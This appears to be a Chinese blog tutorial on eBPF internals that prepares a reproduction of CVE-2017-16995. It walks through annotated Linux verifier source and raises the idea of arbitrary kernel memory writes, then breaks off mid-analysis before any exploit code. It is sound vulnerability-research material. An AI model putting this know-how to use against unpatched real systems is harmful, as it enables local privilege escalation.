ebpf入门&cve-2017-16995复现

前言

CVE-2017-16995是一个ebpf模块相关的内核提权漏洞,漏洞存在于内核版本小于4.13.9的系统中,漏洞成因为kernel/bpf/verifier.c文件中的check_alu_op函数的检查问题,这个漏洞可以允许一个普通用户向系统发起拒绝服务攻击(内存破坏)或者提升到特权用户。

前置知识

eBPF简介

众所周知,linux的用户层和内核层是隔离的,想让内核执行用户的代码,正常是需要编写内核模块,当然内核模块只能root用户才能加载。而BPF则相当于是内核给用户开的一个绿色通道:BPF(Berkeley Packet Filter)提供了一个用户和内核之间代码和数据传输的桥梁。用户可以用eBPF指令字节码的形式向内核输送代码,并通过事件(如往socket写数据)来触发内核执行用户提供的代码;同时以map(key,value)的形式来和内核共享数据,用户层向map中写数据,内核层从map中取数据,反之亦然。BPF设计初衷是用来在底层对网络进行过滤,后续由于他可以方便的向内核注入代码,并且还提供了一套完整的安全措施来对内核进行保护,被广泛用于抓包、内核probe、性能监控等领域。BPF发展经历了2个阶段,cBPF(classic BPF)和eBPF(extend BPF),cBPF已退出历史舞台,后文提到的BPF默认为eBPF。

eBPF指令集

eBPF也有一套自己的指令集,可以想象成实现了一个虚拟机,其中有11个虚拟寄存器,根据调用规则可以对应到我们x86的寄存器中。

1
2
3
4
5
6
7
8
9
10
11
R0 -- RAX
R1 -- RDI
R2 -- RSI
R3 -- RDX
R4 -- RCX
R5 -- R8
R6 -- RBX
R7 -- R13
R8 -- R14
R9 -- R15
R10 -- RBP

每条指令的格式如下,成员包括操作码,目标寄存器,源寄存器,偏移和立即数。

1
2
3
4
5
6
7
struct bpf_insn {
__u8 code; /* opcode */
__u8 dst_reg:4; /* dest register */
__u8 src_reg:4; /* source register */
__s16 off; /* signed offset */
__s32 imm; /* signed immediate constant */
};

如一条简单的x86赋值指令:mov esi, 0xffffffff,对应的BPF指令为:BPF_MOV32_IMM(BPF_REG_2, 0xFFFFFFFF),其对应的数据结构为:

1
2
3
4
5
6
7
#define BPF_MOV32_IMM(DST, IMM)					\
((struct bpf_insn) { \
.code = BPF_ALU | BPF_MOV | BPF_K, \
.dst_reg = DST, \
.src_reg = 0, \
.off = 0, \
.imm = IMM })

操作码共有8种大类,以低3bit区分不同操作码,BPF_ALU为计算指令,BPF_MISC为其他指令,其他指令根据名字就可以猜到其含义。
eBPF指令的编码如下,低三个bits被用来做指令大类的标志。这部分参考了文档,这里可以看到0x6和0x7两个指令名在源码中命名实际上是用BPF,这里只介绍eBPF。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
  +----------------+--------+--------------------+
| 4 bits | 1 bit | 3 bits |
| operation code | source | instruction class |
+----------------+--------+--------------------+
(MSB) (LSB)

Three LSB bits store instruction class which is one of:

Classic BPF classes: eBPF classes:

BPF_LD 0x00 BPF_LD 0x00
BPF_LDX 0x01 BPF_LDX 0x01
BPF_ST 0x02 BPF_ST 0x02
BPF_STX 0x03 BPF_STX 0x03
BPF_ALU 0x04 BPF_ALU 0x04
BPF_JMP 0x05 BPF_JMP 0x05
BPF_RET 0x06 [ class 6 unused, for future if needed ]
BPF_MISC 0x07 BPF_ALU64 0x07

当指令类型为BPF_ALU or BPF_JMP,第4bit进行编码,BPF_K表示使用32位的立即数作为源操作数,BPF_X表示使用寄存器X作为源操作数。MSB的4bit表示操作数。

1
2
BPF_K     0x00
BPF_X 0x08

当指令类型为BPF_ALU or BPF_ALU64,实际指令类型为以下之一,也就是常见的运算指令。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
If BPF_CLASS(code) == BPF_ALU or BPF_ALU64 [ in eBPF ], BPF_OP(code) is one of:

BPF_ADD 0x00
BPF_SUB 0x10
BPF_MUL 0x20
BPF_DIV 0x30
BPF_OR 0x40
BPF_AND 0x50
BPF_LSH 0x60
BPF_RSH 0x70
BPF_NEG 0x80
BPF_MOD 0x90
BPF_XOR 0xa0
BPF_MOV 0xb0 /* eBPF only: mov reg to reg */
BPF_ARSH 0xc0 /* eBPF only: sign extending shift right */
BPF_END 0xd0 /* eBPF only: endianness conversion */

当指令类型为BPF_JMP ,指令实际类型为以下之一,包括条件跳转和非条件跳转。

1
2
3
4
5
6
7
8
9
10
11
12
If BPF_CLASS(code) == BPF_JMP, BPF_OP(code) is one of:

BPF_JA 0x00
BPF_JEQ 0x10
BPF_JGT 0x20
BPF_JGE 0x30
BPF_JSET 0x40
BPF_JNE 0x50 /* eBPF only: jump != */
BPF_JSGT 0x60 /* eBPF only: signed '>' */
BPF_JSGE 0x70 /* eBPF only: signed '>=' */
BPF_CALL 0x80 /* eBPF only: function call */
BPF_EXIT 0x90 /* eBPF only: function return */

举个小例子,如 BPF_ADD | BPF_X | BPF_ALU表示的含义是(u32) dst_reg + (u32) src_reg,BPF_XOR | BPF_K | BPF_ALU表示src_reg = (u32) src_reg ^ (u32) imm32。

eBPF的加载过程

一个典型的BPF程序流程为:

  1. 用户程序调用syscall(__NR_bpf, BPF_MAP_CREATE, &attr, sizeof(attr))申请创建一个map,在attr结构体中指定map的类型、大小、最大容量等属性。
  2. 用户程序调用syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr))来将我们写的BPF代码加载进内核,attr结构体中包含了指令数量、指令首地址指针、日志级别等属性。在加载之前会利用虚拟执行的方式来做安全性校验,这个校验包括对指定语法的检查、指令数量的检查、指令中的指针和立即数的范围及读写权限检查,禁止将内核中的地址暴露给用户空间,禁止对BPF程序stack之外的内核地址读写。安全校验通过后,程序被成功加载至内核,后续真正执行时,不再重复做检查。
  3. 用户程序通过调用setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd)将我们写的BPF程序绑定到指定的socket上。progfd为上一步骤的返回值。
  4. 用户程序通过操作上一步骤中的socket来触发BPF真正执行。

    BPF_MAP_CREATE

    这个系统调用首先调用map_create函数,其核心思想是对申请出一块内存空间,其大小是管理块结构体+attr参数中的size大小,为其分配fd,并将其放入到map队列中,可以用fd号来查找。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    /* called via syscall */
    static int map_create(union bpf_attr *attr)
    {
    struct bpf_map *map;
    int err;

    err = CHECK_ATTR(BPF_MAP_CREATE);
    if (err)
    return -EINVAL;

    /* find map type and init map: hashtable vs rbtree vs bloom vs ... */
    map = find_and_alloc_map(attr);
    if (IS_ERR(map))
    return PTR_ERR(map);

    atomic_set(&map->refcnt, 1);
    atomic_set(&map->usercnt, 1);

    err = bpf_map_charge_memlock(map);
    if (err)
    goto free_map;

    err = bpf_map_new_fd(map);
    if (err < 0)
    /* failed to allocate fd */
    goto free_map;

    return err;

    free_map:
    map->ops->map_free(map);
    return err;
    }

    BPF_PROG_LOAD

    这个系统调用用于将用户编写的EBPF规则加载进入内核,其中包含有多处校验.

    bpf_prog_load

    首先进入bpf_prog_load函数中,功能流程如下。
    [1]检查的ebpf license是否为GPL证书的一种。
    [2]检查指令条数是否超过4096。
    [3]处利用kmalloc新建了一个bpf_prog结构体,并新建了一个用于存放EBPF程序的内存空间。
    [4]处将用户态的EBPF程序拷贝到刚申请的内存中。
    [5]处来判断是哪种过滤模式,其中socket_filter是数据包过滤,而tracing_filter就是对系统调用号及参数的过滤,也就是我们常见的seccomp。最终到达[5]处开始对用户输入的程序进行检查。如果通过检查就将fp中执行函数赋值为 __bpf_prog_run也就是真实执行函数,并尝试JIT加载,否则用中断的方法加载。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    static int bpf_prog_load(union bpf_attr *attr)
    {
    enum bpf_prog_type type = attr->prog_type;
    struct bpf_prog *prog;
    int err;
    char license[128];
    bool is_gpl;

    if (CHECK_ATTR(BPF_PROG_LOAD))
    return -EINVAL;

    /* copy eBPF program license from user space */
    if (strncpy_from_user(license, u64_to_ptr(attr->license),
    sizeof(license) - 1) < 0)
    return -EFAULT;
    license[sizeof(license) - 1] = 0;

    /* eBPF programs must be GPL compatible to use GPL-ed functions */
    [1] is_gpl = license_is_gpl_compatible(license);

    [2] if (attr->insn_cnt >= BPF_MAXINSNS) // 4096
    return -EINVAL;

    if (type == BPF_PROG_TYPE_KPROBE &&
    attr->kern_version != LINUX_VERSION_CODE)
    return -EINVAL;

    if (type != BPF_PROG_TYPE_SOCKET_FILTER && !capable(CAP_SYS_ADMIN))
    return -EPERM;

    /* plain bpf_prog allocation */
    [3] prog = bpf_prog_alloc(bpf_prog_size(attr->insn_cnt), GFP_USER);
    if (!prog)
    return -ENOMEM;

    err = bpf_prog_charge_memlock(prog);
    if (err)
    goto free_prog_nouncharge;

    prog->len = attr->insn_cnt;

    err = -EFAULT;
    [4] if (copy_from_user(prog->insns, u64_to_ptr(attr->insns),
    prog->len * sizeof(struct bpf_insn)) != 0)
    goto free_prog;

    prog->orig_prog = NULL;
    prog->jited = 0;

    atomic_set(&prog->aux->refcnt, 1);
    prog->gpl_compatible = is_gpl ? 1 : 0;

    /* find program type: socket_filter vs tracing_filter */
    [5] err = find_prog_type(type, prog);
    if (err < 0)
    goto free_prog;

    /* run eBPF verifier */
    [6] err = bpf_check(&prog, attr);
    if (err < 0)
    goto free_used_maps;

    /* fixup BPF_CALL->imm field */
    fixup_bpf_calls(prog);

    /* eBPF program is ready to be JITed */
    err = bpf_prog_select_runtime(prog);
    if (err < 0)
    goto free_used_maps;

    err = bpf_prog_new_fd(prog);
    if (err < 0)
    /* failed to allocate fd */
    goto free_used_maps;

    return err;

    free_used_maps:
    free_used_maps(prog->aux);
    free_prog:
    bpf_prog_uncharge_memlock(prog);
    free_prog_nouncharge:
    bpf_prog_free(prog);
    return err;
    }

    bpf_check

    下面进入加载的检查逻辑——bpf_check,功能流程如下。
    [1]处将特定指令中的mapfd换成相应的map实际地址,这里需要注意,map实际地址是一个内核地址,有8字节,这样就需要有两条指令的长度来存这个地址,具体可以看下面对这个函数的分析。
    [2]中借用了程序控制流图的思路来检查这个eBPF程序中是否有死循环和跳转到未初始化的位置,造成无法预期的风险。
    [3]是实际模拟执行的检测当上述有任一出现问题的检测,是检测的重点。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    int bpf_check(struct bpf_prog **prog, union bpf_attr *attr)
    {
    char __user *log_ubuf = NULL;
    struct verifier_env *env;
    int ret = -EINVAL;

    // 指令条数判断
    if ((*prog)->len <= 0 || (*prog)->len > BPF_MAXINSNS)
    return -E2BIG;

    /* 'struct verifier_env' can be global, but since it's not small,
    * allocate/free it every time bpf_check() is called
    */
    env = kzalloc(sizeof(struct verifier_env), GFP_KERNEL);
    if (!env)
    return -ENOMEM;

    env->prog = *prog;

    /* grab the mutex to protect few globals used by verifier */
    mutex_lock(&bpf_verifier_lock);

    if (attr->log_level || attr->log_buf || attr->log_size) {
    /* user requested verbose verifier output
    * and supplied buffer to store the verification trace
    */
    log_level = attr->log_level;
    log_ubuf = (char __user *) (unsigned long) attr->log_buf;
    log_size = attr->log_size;
    log_len = 0;

    ret = -EINVAL;
    /* log_* values have to be sane */
    if (log_size < 128 || log_size > UINT_MAX >> 8 ||
    log_level == 0 || log_ubuf == NULL)
    goto free_env;

    ret = -ENOMEM;
    log_buf = vmalloc(log_size);
    if (!log_buf)
    goto free_env;
    } else {
    log_level = 0;
    }
    // 将伪指令中操作map_fd的部分替换成map地址,注意这个地址是8字节的,因此在实现中用本指令的imm和下一条指令的2个4字节中存储了这个地址
    [1] ret = replace_map_fd_with_map_ptr(env);
    if (ret < 0)
    goto skip_full_check;

    env->explored_states = kcalloc(env->prog->len,
    sizeof(struct verifier_state_list *),
    GFP_USER);
    ret = -ENOMEM;
    if (!env->explored_states)
    goto skip_full_check;

    [2] ret = check_cfg(env);
    if (ret < 0)
    goto skip_full_check;

    env->allow_ptr_leaks = capable(CAP_SYS_ADMIN);

    [3] ret = do_check(env);

    skip_full_check:
    while (pop_stack(env, NULL) >= 0);
    free_states(env);

    if (ret == 0)
    /* program is valid, convert *(u32*)(ctx + off) accesses */
    ret = convert_ctx_accesses(env);

    if (log_level && log_len >= log_size - 1) {
    BUG_ON(log_len >= log_size);
    /* verifier log exceeded user supplied buffer */
    ret = -ENOSPC;
    /* fall through to return what was recorded */
    }

    /* copy verifier log back to user space including trailing zero */
    if (log_level && copy_to_user(log_ubuf, log_buf, log_len + 1) != 0) {
    ret = -EFAULT;
    goto free_log_buf;
    }

    if (ret == 0 && env->used_map_cnt) {
    /* if program passed verifier, update used_maps in bpf_prog_info */
    env->prog->aux->used_maps = kmalloc_array(env->used_map_cnt,
    sizeof(env->used_maps[0]),
    GFP_KERNEL);

    if (!env->prog->aux->used_maps) {
    ret = -ENOMEM;
    goto free_log_buf;
    }

    memcpy(env->prog->aux->used_maps, env->used_maps,
    sizeof(env->used_maps[0]) * env->used_map_cnt);
    env->prog->aux->used_map_cnt = env->used_map_cnt;

    /* program is valid. Convert pseudo bpf_ld_imm64 into generic
    * bpf_ld_imm64 instructions
    */
    convert_pseudo_ld_imm64(env);
    }

    free_log_buf:
    if (log_level)
    vfree(log_buf);
    free_env:
    if (!env->prog->aux->used_maps)
    /* if we didn't copy map pointers into bpf_prog_info, release
    * them now. Otherwise free_bpf_prog_info() will release them.
    */
    release_maps(env);
    *prog = env->prog;
    kfree(env);
    mutex_unlock(&bpf_verifier_lock);
    return ret;
    }

    replace_map_fd_with_map_ptr

    replace_map_fd_with_map_ptr函数中,可以看到当满足[1]、[2]两个条件时,即opcode = BPF_LD | BPF_IMM | BPF_DW=0x18,且src_reg = BPF_PSEUDO_MAP_FD = 1时,将根据imm的值进行map查找,并将得到的地址分成两部分,分别存储于该条指令和下一条指令的imm部分,与上文所说的占用两条指令是相符的。满足上述两个条件的语句又被命名为BPF_LD_MAP_FD,即把map地址放到寄存器里,该指令写完后,下一条指令应为无意义的填充。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    static int replace_map_fd_with_map_ptr(struct verifier_env *env)
    {
    struct bpf_insn *insn = env->prog->insnsi;
    int insn_cnt = env->prog->len;
    int i, j;

    for (i = 0; i < insn_cnt; i++, insn++) {
    if (BPF_CLASS(insn->code) == BPF_LDX &&
    (BPF_MODE(insn->code) != BPF_MEM || insn->imm != 0)) {
    verbose("BPF_LDX uses reserved fields\n");
    return -EINVAL;
    }// 不允许向寄存器直接写值 LDX

    if (BPF_CLASS(insn->code) == BPF_STX &&
    ((BPF_MODE(insn->code) != BPF_MEM &&
    BPF_MODE(insn->code) != BPF_XADD) || insn->imm != 0)) {
    verbose("BPF_STX uses reserved fields\n");
    return -EINVAL;
    }// 不允许向地址写寄存器 STX

    [1] if (insn[0].code == (BPF_LD | BPF_IMM | BPF_DW)) {
    struct bpf_map *map;
    struct fd f;

    if (i == insn_cnt - 1 || insn[1].code != 0 ||
    insn[1].dst_reg != 0 || insn[1].src_reg != 0 ||
    insn[1].off != 0) {
    verbose("invalid bpf_ld_imm64 insn\n");
    return -EINVAL;
    }// 最后一条指令,下一条指令确定为0

    if (insn->src_reg == 0)
    /* valid generic load 64-bit imm */
    goto next_insn;

    [2] if (insn->src_reg != BPF_PSEUDO_MAP_FD) {
    verbose("unrecognized bpf_ld_imm64 insn\n");
    return -EINVAL;
    }

    f = fdget(insn->imm);
    map = __bpf_map_get(f);
    if (IS_ERR(map)) {
    verbose("fd %d is not pointing to valid bpf_map\n",
    insn->imm);
    return PTR_ERR(map);
    }

    /* store map pointer inside BPF_LD_IMM64 instruction */
    insn[0].imm = (u32) (unsigned long) map;
    insn[1].imm = ((u64) (unsigned long) map) >> 32;

    /* check whether we recorded this map already */
    for (j = 0; j < env->used_map_cnt; j++)
    if (env->used_maps[j] == map) {
    fdput(f);
    goto next_insn;
    }

    if (env->used_map_cnt >= MAX_USED_MAPS) {
    fdput(f);
    return -E2BIG;
    }

    /* hold the map. If the program is rejected by verifier,
    * the map will be released by release_maps() or it
    * will be used by the valid program until it's unloaded
    * and all maps are released in free_bpf_prog_info()
    */
    map = bpf_map_inc(map, false);
    if (IS_ERR(map)) {
    fdput(f);
    return PTR_ERR(map);
    }
    env->used_maps[env->used_map_cnt++] = map;

    fdput(f);
    next_insn:
    insn++;
    i++;
    }
    }

    /* now all pseudo BPF_LD_IMM64 instructions load valid
    * 'struct bpf_map *' into a register instead of user map_fd.
    * These pointers will be used later by verifier to validate map access.
    */
    return 0;
    }

    do_check

    下面进行check过程中最核心的do_check函数,首先可以看到整个程序处于一个for死循环中,其中维护了一系列寄存器,其寄存器变量定义和初始化如下,可以看到寄存器的值是一个int类型,并且有一个枚举的type变量,type类型包括未定义、位置、立即数、指针等,初始化时会将全部寄存器类型定义为未定义,赋值为0。第十个寄存器定义为栈指针,第一个定义为内容指针。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    struct reg_state {
    enum bpf_reg_type type;
    union {
    /* valid when type == CONST_IMM | PTR_TO_STACK */
    int imm;

    /* valid when type == CONST_PTR_TO_MAP | PTR_TO_MAP_VALUE |
    * PTR_TO_MAP_VALUE_OR_NULL
    */
    struct bpf_map *map_ptr;
    };
    };
    static void init_reg_state(struct reg_state *regs)
    {
    int i;

    for (i = 0; i < MAX_BPF_REG; i++) {
    regs[i].type = NOT_INIT;
    regs[i].imm = 0;
    regs[i].map_ptr = NULL;
    }

    /* frame pointer */
    regs[BPF_REG_FP].type = FRAME_PTR;

    /* 1st arg to a function */
    regs[BPF_REG_1].type = PTR_TO_CTX;
    }
    /* types of values stored in eBPF registers */
    enum bpf_reg_type {
    NOT_INIT = 0, /* nothing was written into register */
    UNKNOWN_VALUE, /* reg doesn't contain a valid pointer */
    PTR_TO_CTX, /* reg points to bpf_context */
    CONST_PTR_TO_MAP, /* reg points to struct bpf_map */
    PTR_TO_MAP_VALUE, /* reg points to map element value */
    PTR_TO_MAP_VALUE_OR_NULL,/* points to map elem value or NULL */
    FRAME_PTR, /* reg == frame_pointer */
    PTR_TO_STACK, /* reg == frame_pointer + imm */
    CONST_IMM, /* constant integer value */
    };
    check函数的处理方式是逐条处理,按照不同的类型分别做check。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    static int do_check(struct verifier_env *env)
    {
    ...
    init_reg_state(regs);
    insn_idx = 0;
    for (;;) {
    struct bpf_insn *insn;
    u8 class;
    int err;

    if (insn_idx >= insn_cnt) {
    verbose("invalid insn idx %d insn_cnt %d\n",
    insn_idx, insn_cnt);
    return -EFAULT;
    }

    //每次取一条指令
    insn = &insns[insn_idx];
    //获取指令的操作码
    class = BPF_CLASS(insn->code);
    ...
    由于指令比较多,不一样赘述了,下面从两个攻击角度去展示程序是如何检测的。
    for循环检查结束并退出
    退出指令定义为BPF_EXIT,这个指令属于BPF_JMP大类,可以看到当指令为该条指令的时候会执行一个pop_stack操作,而当这个函数的返回值是负数的时候,用break跳出死循环。否则会用这个作为取值的位置去执行下一条指令。对于这个操作的理解是,当遇到条件跳转的时候,程序会默认执行一个分支,然后将另外一个分支压入stack中,当一个分支执行结束后,去检查另外一个分支,类似于迷宫问题解决里走到思路的退栈操作。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    else if (class == BPF_JMP) {
    u8 opcode = BPF_OP(insn->code);

    if (opcode == BPF_CALL) {
    if (BPF_SRC(insn->code) != BPF_K ||
    insn->off != 0 ||
    insn->src_reg != BPF_REG_0 ||
    insn->dst_reg != BPF_REG_0) {
    verbose("BPF_CALL uses reserved fields\n");
    return -EINVAL;
    }

    err = check_call(env, insn->imm);
    if (err)
    return err;

    } else if (opcode == BPF_JA) {
    if (BPF_SRC(insn->code) != BPF_K ||
    insn->imm != 0 ||
    insn->src_reg != BPF_REG_0 ||
    insn->dst_reg != BPF_REG_0) {
    verbose("BPF_JA uses reserved fields\n");
    return -EINVAL;
    }

    insn_idx += insn->off + 1;
    continue;

    } else if (opcode == BPF_EXIT) {
    if (BPF_SRC(insn->code) != BPF_K ||
    insn->imm != 0 ||
    insn->src_reg != BPF_REG_0 ||
    insn->dst_reg != BPF_REG_0) {
    verbose("BPF_EXIT uses reserved fields\n");
    return -EINVAL;
    }

    /* eBPF calling convetion is such that R0 is used
    * to return the value from eBPF program.
    * Make sure that it's readable at this time
    * of bpf_exit, which means that program wrote
    * something into it earlier
    */
    err = check_reg_arg(regs, BPF_REG_0, SRC_OP);
    if (err)
    return err;

    if (is_pointer_value(env, BPF_REG_0)) {
    verbose("R0 leaks addr as return value\n");
    return -EACCES;
    }

    process_bpf_exit:
    insn_idx = pop_stack(env, &prev_insn_idx);
    if (insn_idx < 0) {
    break;
    } else {
    do_print_state = true;
    continue;
    }
    } else {
    err = check_cond_jmp_op(env, insn, &insn_idx);
    if (err)
    return err;
    }
    }
    查看一下pop_stack函数,函数中先判断env->head是否为0,如果是就代表没有未检查的路径了。否则将保持的state恢复。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    static int pop_stack(struct verifier_env *env, int *prev_insn_idx)
    {
    struct verifier_stack_elem *elem;
    int insn_idx;

    if (env->head == NULL)
    return -1;

    memcpy(&env->cur_state, &env->head->st, sizeof(env->cur_state));
    insn_idx = env->head->insn_idx;
    if (prev_insn_idx)
    *prev_insn_idx = env->head->prev_insn_idx;
    elem = env->head->next;
    kfree(env->head);
    env->head = elem;
    env->stack_size--;
    return insn_idx;
    }

    #define MAX_USED_MAPS 64 /* max number of maps accessed by one eBPF program */

    /* single container for all structs
    * one verifier_env per bpf_check() call
    */
    struct verifier_env {
    struct bpf_prog *prog; /* eBPF program being verified */
    struct verifier_stack_elem *head; /* stack of verifier states to be processed */
    int stack_size; /* number of states to be processed */
    struct verifier_state cur_state; /* current verifier state */
    struct verifier_state_list **explored_states; /* search pruning optimization */
    struct bpf_map *used_maps[MAX_USED_MAPS]; /* array of map's used by eBPF program */
    u32 used_map_cnt; /* number of used maps */
    bool allow_ptr_leaks;
    };
    然后看一下条件分支的处理代码check_cond_jmp_op,我们可以看到这个检查将跳转分成两种,第一种[1]处是JEQ和JNE,并且是比较的值是立即数的情况,此时就判断立即数是不是等于要比较的寄存器,进行直接跳转。第二种[2]处是其他情况,均需把off+1的值压入栈中作为另一条分支。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
     int check_cond_jmp_op(struct verifier_env *env,
    struct bpf_insn *insn, int *insn_idx)
    {
    struct reg_state *regs = env->cur_state.regs;
    struct verifier_state *other_branch;
    u8 opcode = BPF_OP(insn->code);
    int err;

    if (opcode > BPF_EXIT) {
    verbose("invalid BPF_JMP opcode %x\n", opcode);
    return -EINVAL;
    }

    if (BPF_SRC(insn->code) == BPF_X) {
    if (insn->imm != 0) {
    verbose("BPF_JMP uses reserved fields\n");
    return -EINVAL;
    }

    /* check src1 operand */
    err = check_reg_arg(regs, insn->src_reg, SRC_OP);
    if (err)
    return err;

    if (is_pointer_value(env, insn->src_reg)) {
    verbose("R%d pointer comparison prohibited\n",
    insn->src_reg);
    return -EACCES;
    }
    } else {
    if (insn->src_reg != BPF_REG_0) {
    verbose("BPF_JMP uses reserved fields\n");
    return -EINVAL;
    }
    }

    /* check src2 operand */
    err = check_reg_arg(regs, insn->dst_reg, SRC_OP);
    if (err)
    return err;

    /* detect if R == 0 where R was initialized to zero earlier */
    [1] if (BPF_SRC(insn->code) == BPF_K &&
    (opcode == BPF_JEQ || opcode == BPF_JNE) &&
    regs[insn->dst_reg].type == CONST_IMM &&
    regs[insn->dst_reg].imm == insn->imm) {
    if (opcode == BPF_JEQ) {
    /* if (imm == imm) goto pc+off;
    * only follow the goto, ignore fall-through
    */
    *insn_idx += insn->off;
    return 0;
    } else {
    /* if (imm != imm) goto pc+off;
    * only follow fall-through branch, since
    * that's where the program will go
    */
    return 0;
    }
    }

    [2] other_branch = push_stack(env, *insn_idx + insn->off + 1, *insn_idx);
    if (!other_branch)
    return -EFAULT;

    /* detect if R == 0 where R is returned value from bpf_map_lookup_elem() */
    if (BPF_SRC(insn->code) == BPF_K &&
    insn->imm == 0 && (opcode == BPF_JEQ ||
    opcode == BPF_JNE) &&
    regs[insn->dst_reg].type == PTR_TO_MAP_VALUE_OR_NULL) {
    if (opcode == BPF_JEQ) {
    /* next fallthrough insn can access memory via
    * this register
    */
    regs[insn->dst_reg].type = PTR_TO_MAP_VALUE;
    /* branch targer cannot access it, since reg == 0 */
    other_branch->regs[insn->dst_reg].type = CONST_IMM;
    other_branch->regs[insn->dst_reg].imm = 0;
    } else {
    other_branch->regs[insn->dst_reg].type = PTR_TO_MAP_VALUE;
    regs[insn->dst_reg].type = CONST_IMM;
    regs[insn->dst_reg].imm = 0;
    }
    } else if (is_pointer_value(env, insn->dst_reg)) {
    verbose("R%d pointer comparison prohibited\n", insn->dst_reg);
    return -EACCES;
    } else if (BPF_SRC(insn->code) == BPF_K &&
    (opcode == BPF_JEQ || opcode == BPF_JNE)) {

    if (opcode == BPF_JEQ) {
    /* detect if (R == imm) goto
    * and in the target state recognize that R = imm
    */
    other_branch->regs[insn->dst_reg].type = CONST_IMM;
    other_branch->regs[insn->dst_reg].imm = insn->imm;
    } else {
    /* detect if (R != imm) goto
    * and in the fall-through state recognize that R = imm
    */
    regs[insn->dst_reg].type = CONST_IMM;
    regs[insn->dst_reg].imm = insn->imm;
    }
    }
    if (log_level)
    print_verifier_state(env);
    return 0;
    }
    能否直接进行内存读写?
    内存读写需要用到的指令主要是BPF_LDX_MEM或者BPF_STX_MEM两类。如下,当 r7 和 r8 的值可控就可以达到内存任意写,类似于mov dword ptr[r7], r8这样的操作。
    1
    STX_MEM_DW(8,7,0x0,0x0)
    接下来分析一下ST和LD有哪些限制,check_reg_arg[1]处检查寄存器是否访问寄存器的序号是否超过最大值10,如果是SRC_OP检查是否是未初始化的值。否则检查是否要写的地方是rbp,并将要写的寄存器值置为UNKOWN。然后是[2]check_mem_access检查,该函数会根据读写类型检查dst或src的值是否为栈指针、数据包指针、map指针,否则不允许读写。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    else if (class == BPF_LDX) {
    enum bpf_reg_type src_reg_type;

    /* check for reserved fields is already done */

    /* check src operand */
    [1] err = check_reg_arg(regs, insn->src_reg, SRC_OP);
    if (err)
    return err;

    [1] err = check_reg_arg(regs, insn->dst_reg, DST_OP_NO_MARK);
    if (err)
    return err;

    src_reg_type = regs[insn->src_reg].type;

    /* check that memory (src_reg + off) is readable,
    * the state of dst_reg will be updated by this func
    */
